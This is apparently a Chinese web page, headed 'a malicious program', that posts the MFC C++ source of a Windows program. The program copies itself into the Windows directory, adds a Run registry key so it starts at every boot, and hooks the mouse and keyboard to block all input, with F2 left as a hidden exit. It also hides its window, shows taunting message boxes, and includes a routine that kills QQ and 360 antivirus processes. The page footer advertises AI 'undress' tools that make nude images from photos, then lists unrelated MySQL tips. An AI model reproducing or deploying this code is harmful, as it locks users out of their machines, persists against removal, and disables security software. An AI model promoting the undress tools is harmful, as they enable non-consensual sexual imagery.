一个恶意程序
<span //</span><span KeyBoardHookDialogDlg.cpp : implementation file
</span><span //
</span><span
#include </span><span "</span><span stdafx.h</span><span "</span><span
#include </span><span "</span><span KeyBoardHookDialog.h</span><span "</span><span
#include </span><span "</span><span KeyBoardHookDialogDlg.h</span><span "</span>
<span #define</span> REG_RUN "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"<span
#include </span><tlhelp32.h><span
#ifdef _DEBUG
</span><span #define</span> new DEBUG_NEW
<span #undef</span> THIS_FILE
<span static</span> <span char</span> THIS_FILE[] =<span __FILE__;
</span><span #endif</span>
<span //</span><span #pragma comment (lib,"KeyBoardHook")</span>
<span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CAboutDlg dialog used for App About
</span><span //</span><span 定义全局HHOOK变量,用于保存</span>
<span HHOOK g_hMouse;
HHOOK g_hKeyboard;
</span><span bool</span> isTrue = <span false</span><span ;
HWND hWnd; </span><span //</span><span 保存当前句柄
</span><span //</span><span 注意以下俩个钩子过程是全局函数,所以里面的API要用全局的</span>
<span LRESULT CALLBACK MouseProc(
</span><span int</span> nCode, <span //</span><span hook code</span>
WPARAM wParam, <span //</span><span message identifier</span>
LPARAM lParam <span //</span><span mouse coordinates</span>
<span )
{
</span><span return</span> <span 1</span><span ;
}
LRESULT CALLBACK KeyboardProc(
</span><span int</span> code, <span //</span><span hook code</span>
WPARAM wParam, <span //</span><span virtual-key code</span>
LPARAM lParam <span //</span><span keystroke-message information</span>
<span )
{
</span><span //</span><span if(VK_SPACE == wParam || VK_RETURN == wParam) </span><span //</span><span 屏蔽空格和回车键</span>
<span /*</span><span if(VK_F4 == wParam && (lParam>>29 & 1)) //屏蔽ALT + F4键
return 1;
else
return CallNextHookEx(g_hKeyboard,code,wParam,lParam);</span><span */</span>
<span //</span><span 留个后门,使当按下F2键时,程序将退</span>
<span if</span>(VK_F2 ==<span wParam)
{
</span><span //</span><span 调用全局API函数向程序发出关闭消息</span>
::SendMessage(hWnd,WM_CLOSE,<span 0</span>,<span 0</span><span );
</span><span //</span><span 卸载钩子</span>
<span UnhookWindowsHookEx(g_hMouse);
UnhookWindowsHookEx(g_hKeyboard);
}
</span><span return</span> <span 1</span><span ;
}
</span><span class</span> CAboutDlg : <span public</span><span CDialog
{
</span><span public</span><span :
CAboutDlg();
</span><span //</span><span Dialog Data
</span><span //</span><span {{AFX_DATA(CAboutDlg)</span>
<span enum</span> { IDD =<span IDD_ABOUTBOX };
</span><span //</span><span }}AFX_DATA
</span><span //</span><span ClassWizard generated virtual function overridesf
</span><span //</span><span {{AFX_VIRTUAL(CAboutDlg)</span>
<span protected</span><span :
</span><span virtual</span> <span void</span> DoDataExchange(CDataExchange* pDX); <span //</span><span DDX/DDV support
</span><span //</span><span }}AFX_VIRTUAL
</span><span //</span><span Implementation</span>
<span protected</span><span :
</span><span //</span><span {{AFX_MSG(CAboutDlg)
</span><span //</span><span }}AFX_MSG</span>
<span DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
</span><span //</span><span {{AFX_DATA_INIT(CAboutDlg)
</span><span //</span><span }}AFX_DATA_INIT</span>
<span }
</span><span void</span> CAboutDlg::DoDataExchange(CDataExchange*<span pDX)
{
CDialog::DoDataExchange(pDX);
</span><span //</span><span {{AFX_DATA_MAP(CAboutDlg)
</span><span //</span><span }}AFX_DATA_MAP</span>
<span }
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
</span><span //</span><span {{AFX_MSG_MAP(CAboutDlg)
</span><span //</span><span No message handlers
</span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CKeyBoardHookDialogDlg dialog</span>
<span
CKeyBoardHookDialogDlg::CKeyBoardHookDialogDlg(CWnd</span>* pParent <span /*</span><span =NULL</span><span */</span><span )
: CDialog(CKeyBoardHookDialogDlg::IDD, pParent)
{
</span><span //</span><span {{AFX_DATA_INIT(CKeyBoardHookDialogDlg)
</span><span //</span><span NOTE: the ClassWizard will add member initialization here
</span><span //</span><span }}AFX_DATA_INIT
</span><span //</span><span Note that LoadIcon does not require a subsequent DestroyIcon in Win32</span>
m_hIcon = AfxGetApp()-><span LoadIcon(IDR_MAINFRAME);
}
</span><span void</span> CKeyBoardHookDialogDlg::DoDataExchange(CDataExchange*<span pDX)
{
CDialog::DoDataExchange(pDX);
</span><span //</span><span {{AFX_DATA_MAP(CKeyBoardHookDialogDlg)
</span><span //</span><span NOTE: the ClassWizard will add DDX and DDV calls here
</span><span //</span><span }}AFX_DATA_MAP</span>
<span }
BEGIN_MESSAGE_MAP(CKeyBoardHookDialogDlg, CDialog)
</span><span //</span><span {{AFX_MSG_MAP(CKeyBoardHookDialogDlg)</span>
<span ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_BN_CLICKED(IDC_BTN_HOOKON, OnBtnHookon)
ON_WM_TIMER()
</span><span //</span><span }}AFX_MSG_MAP</span>
<span END_MESSAGE_MAP()
</span><span ///////////////////////////////////////////////////////////////////////////</span><span //</span>
<span //</span><span CKeyBoardHookDialogDlg message handlers</span>
<span
BOOL CKeyBoardHookDialogDlg::OnInitDialog()
{
CDialog::OnInitDialog();
</span><span //</span><span Add "About..." menu item to system menu.
</span><span //</span><span IDM_ABOUTBOX must be in the system command range.</span>
ASSERT((IDM_ABOUTBOX & <span 0xFFF0</span>) ==<span IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX </span>< <span 0xF000</span><span );
CMenu</span>* pSysMenu =<span GetSystemMenu(FALSE);
</span><span if</span> (pSysMenu !=<span NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
</span><span if</span> (!<span strAboutMenu.IsEmpty())
{
pSysMenu</span>-><span AppendMenu(MF_SEPARATOR);
pSysMenu</span>-><span AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
</span><span //</span><span Set the icon for this dialog. The framework does this automatically
</span><span //</span><span when the application's main window is not a dialog</span>
SetIcon(m_hIcon, TRUE); <span //</span><span Set big icon</span>
SetIcon(m_hIcon, FALSE); <span //</span><span Set small icon
</span><span //</span><span TODO: Add extra initialization here</span>
<span
CopySelf();
autoRun();</span><span //</span><span 注册表启动
</span><span //</span><span 设定钩子
</span><span //</span><span ShowProcess();</span>
g_hMouse =<span SetWindowsHookEx(WH_MOUSE,MouseProc,NULL,GetCurrentThreadId());
g_hKeyboard </span>=<span SetWindowsHookEx(WH_KEYBOARD,KeyboardProc,NULL,GetCurrentThreadId());
</span><span //</span><span 保存句柄</span>
hWnd =<span m_hWnd;
SetTimer(</span><span 1</span>, <span 2000</span><span , NULL);
isTrue </span>= <span true</span><span ;
</span><span return</span> TRUE; <span //</span><span return TRUE unless you set the focus to a control</span>
<span }
</span><span void</span><span CKeyBoardHookDialogDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
</span><span if</span> ((nID & <span 0xFFF0</span>) ==<span IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
</span><span else</span><span
{
CDialog::OnSysCommand(nID, lParam);
}
}
</span><span //</span><span If you add a minimize button to your dialog, you will need the code below
</span><span //</span><span to draw the icon. For MFC applications using the document/view model,
</span><span //</span><span this is automatically done for you by the framework.</span>
<span void</span><span CKeyBoardHookDialogDlg::OnPaint()
{
</span><span if</span><span (IsIconic())
{
CPaintDC dc(</span><span this</span>); <span //</span><span device context for painting</span>
<span
SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), </span><span 0</span><span );
</span><span //</span><span Center icon in client rectangle</span>
<span int</span> cxIcon =<span GetSystemMetrics(SM_CXICON);
</span><span int</span> cyIcon =<span GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(</span>&<span rect);
</span><span int</span> x = (rect.Width() - cxIcon + <span 1</span>) / <span 2</span><span ;
</span><span int</span> y = (rect.Height() - cyIcon + <span 1</span>) / <span 2</span><span ;
</span><span //</span><span Draw the icon</span>
<span dc.DrawIcon(x, y, m_hIcon);
}
</span><span else</span><span
{
CDialog::OnPaint();
}
}
</span><span //</span><span The system calls this to obtain the cursor to display while the user drags
</span><span //</span><span the minimized window.</span>
<span HCURSOR CKeyBoardHookDialogDlg::OnQueryDragIcon()
{
</span><span return</span><span (HCURSOR) m_hIcon;
}
</span><span void</span><span CKeyBoardHookDialogDlg::OnBtnHookon()
{
</span><span //</span><span TODO: Add your control notification handler code here</span>
<span
}
</span><span //</span><span DEL void CKeyBoardHookDialogDlg::OnBtnHookoff()
</span><span //</span><span DEL {
</span><span //</span><span DEL </span><span //</span><span TODO: Add your control notification handler code here
</span><span //</span><span DEL SetHookOff();
</span><span //</span><span DEL
</span><span //</span><span DEL }</span>
<span void</span><span CKeyBoardHookDialogDlg::hide()
{
ShowWindow(SW_HIDE);
}
</span><span void</span><span CKeyBoardHookDialogDlg::autoRun()
{
HKEY hKey </span>=<span NULL;
LONG lRet </span>= RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&<span hKey);
</span><span if</span>(lRet !=<span ERROR_SUCCESS)
{
</span><span return</span><span ;
}
RegSetValueEx(hKey,</span><span "</span><span mynona</span><span "</span>,NULL,REG_SZ,(<span const</span> unsigned <span char</span> *)&<span szWindowsPath,
strlen(szWindowsPath) </span>+<span sizeof</span>(<span char</span><span ));
RegCloseKey(hKey);
}
</span><span void</span><span CKeyBoardHookDialogDlg::ShowProcess()
{
HANDLE hSnap </span>=<span CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
</span><span //</span><span ...</span>
<span
PROCESSENTRY32 Pe32 </span>= {<span 0</span><span };
Pe32.dwSize </span>= <span sizeof</span><span (PROCESSENTRY32);
</span><span int</span> bRet = Process32First(hSnap,&<span Pe32);
</span><span //</span><span 360IOSMgrSrv 360tray </span>
<span char</span> name[MAX_PATH] = <span "</span><span QQ.exe</span><span "</span><span ;
</span><span char</span> name2[MAX_PATH] = <span "</span><span 360tray.exe</span><span "</span><span ;
</span><span char</span> name3[MAX_PATH] = <span "</span><span 360rp.exe</span><span "</span><span ;
</span><span while</span><span (bRet)
{
</span><span //</span><span ...</span>
bRet = Process32Next(hSnap,&<span Pe32);
</span><span //</span><span cout<<"id:"<<Pe32.th32ProcessID<<" name:"<<Pe32.szExeFile<<endl;</span>
<span int</span> flag = <span 0</span><span ;
</span><span if</span>(strcmp(Pe32.szExeFile,name) == <span 0</span> || strcmp(Pe32.szExeFile,name3) == <span 0</span> || strcmp(Pe32.szExeFile,name2) ==<span 0</span><span )
flag </span>= <span 1</span><span ;
</span><span if</span><span (flag){
</span><span //</span><span cout<<"----------------------"<<Pe32.th32ProcessID<<endl;</span>
<span MessageBox(Pe32.szExeFile);
HANDLE hProcess </span>=<span OpenProcess(PROCESS_TERMINATE,FALSE,Pe32.th32ProcessID);
LPDWORD lpExitCode </span>= <span 0</span><span ;
GetExitCodeProcess(hProcess, lpExitCode);
TerminateProcess(hProcess, (UINT)lpExitCode);
}
}
}
</span><span void</span><span CKeyBoardHookDialogDlg::CopySelf()
{
</span><span char</span> szSelfName[MAX_PATH] = {<span 0</span><span };
</span><span //</span><span char szSystemPath[MAX_PATH] = {0};</span>
<span char</span> szTmpPath[MAX_PATH] = {<span 0</span><span };
</span><span //</span><span 获取当前程序自身路径</span>
<span GetModuleFileName(NULL,szSelfName,MAX_PATH);
</span><span //</span><span cout<<"szSelfName:"<<szSelfName<<endl;
</span><span //</span><span 获取系统目录</span>
<span GetWindowsDirectory(szWindowsPath,MAX_PATH);
</span><span //</span><span cout<<"szWindowsPath:"<<szWindowsPath<<endl;
</span><span //</span><span 获取windows目录
</span><span //</span><span GetSystemDirectory(szSystemPath,MAX_PATH);
</span><span //</span><span cout<<"szSystemPath:"<<szSystemPath<<endl;</span>
<span
strcat(szWindowsPath,</span><span "</span><span \\mynona.exe</span><span "</span><span );
</span><span //</span><span strcat(szSystemPath,"\\mynona.exe");</span>
<span
MessageBox( szWindowsPath,</span><span "</span><span : szWindowsPath</span><span "</span><span );
</span><span //</span><span MessageBox( szSystemPath,": szSystemPath"); </span>
<span int</span> isTrue = CopyFile(szSelfName,szWindowsPath,FALSE);<span //</span><span FALSE表示强行覆盖原有文件
</span><span //</span><span int isTrue2 = CopyFile(szSelfName,szSystemPath,FALSE);</span>
<span
}
</span><span void</span><span CKeyBoardHookDialogDlg::OnTimer(UINT nIDEvent)
{
</span><span //</span><span TODO: Add your message handler code here and/or call default</span>
<span if</span><span (isTrue){
ShowWindow(SW_HIDE);
}
MessageBox(</span><span "</span><span haha</span><span "</span>,<span "</span><span 哈哈</span><span "</span><span ,MB_ICONSTOP);
CDialog::OnTimer(nIDEvent);
}</span>
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
Can I install mysql on Windows 7
Apr 08, 2025 pm 03:21 PM
Yes, MySQL can be installed on Windows 7, and although Microsoft has stopped supporting Windows 7, MySQL is still compatible with it. However, the following points should be noted during the installation process: Download the MySQL installer for Windows. Select the appropriate version of MySQL (community or enterprise). Select the appropriate installation directory and character set during the installation process. Set the root user password and keep it properly. Connect to the database for testing. Note the compatibility and security issues on Windows 7, and it is recommended to upgrade to a supported operating system.
How to solve mysql cannot connect to local host
Apr 08, 2025 pm 02:24 PM
The MySQL connection may be due to the following reasons: MySQL service is not started, the firewall intercepts the connection, the port number is incorrect, the user name or password is incorrect, the listening address in my.cnf is improperly configured, etc. The troubleshooting steps include: 1. Check whether the MySQL service is running; 2. Adjust the firewall settings to allow MySQL to listen to port 3306; 3. Confirm that the port number is consistent with the actual port number; 4. Check whether the user name and password are correct; 5. Make sure the bind-address settings in my.cnf are correct.
MySQL can't be installed after downloading
Apr 08, 2025 am 11:24 AM
The main reasons for MySQL installation failure are: 1. Permission issues, you need to run as an administrator or use the sudo command; 2. Dependencies are missing, and you need to install relevant development packages; 3. Port conflicts, you need to close the program that occupies port 3306 or modify the configuration file; 4. The installation package is corrupt, you need to download and verify the integrity; 5. The environment variable is incorrectly configured, and the environment variables must be correctly configured according to the operating system. Solve these problems and carefully check each step to successfully install MySQL.
Solutions to the errors reported by MySQL on a specific system version
Apr 08, 2025 am 11:54 AM
The solution to MySQL installation error is: 1. Carefully check the system environment to ensure that the MySQL dependency library requirements are met. Different operating systems and version requirements are different; 2. Carefully read the error message and take corresponding measures according to prompts (such as missing library files or insufficient permissions), such as installing dependencies or using sudo commands; 3. If necessary, try to install the source code and carefully check the compilation log, but this requires a certain amount of Linux knowledge and experience. The key to ultimately solving the problem is to carefully check the system environment and error information, and refer to the official documents.
How to copy and paste mysql
Apr 08, 2025 pm 07:18 PM
Copy and paste in MySQL includes the following steps: select the data, copy with Ctrl C (Windows) or Cmd C (Mac); right-click at the target location, select Paste or use Ctrl V (Windows) or Cmd V (Mac); the copied data is inserted into the target location, or replace existing data (depending on whether the data already exists at the target location).
Unable to access mysql from terminal
Apr 08, 2025 pm 04:57 PM
Unable to access MySQL from the terminal may be due to: MySQL service not running; connection command error; insufficient permissions; firewall blocks connection; MySQL configuration file error.
Can mysql run on Windows
Apr 08, 2025 pm 01:54 PM
Running MySQL on Windows is feasible, but challenges such as port conflicts, permission issues, and environment variable settings need to be considered. Installation issues can be solved by customizing configuration files, adjusting user permissions, and setting environment variables correctly. Additionally, the appropriate storage engine should be selected, tweaked configuration files, and SSDs should be used to optimize performance.
Can vs code run in Windows 8
Apr 15, 2025 pm 07:24 PM
VS Code can run on Windows 8, but the experience may not be great. First make sure the system has been updated to the latest patch, then download the VS Code installation package that matches the system architecture and install it as prompted. After installation, be aware that some extensions may be incompatible with Windows 8 and need to look for alternative extensions or use newer Windows systems in a virtual machine. Install the necessary extensions to check whether they work properly. Although VS Code is feasible on Windows 8, it is recommended to upgrade to a newer Windows system for a better development experience and security.
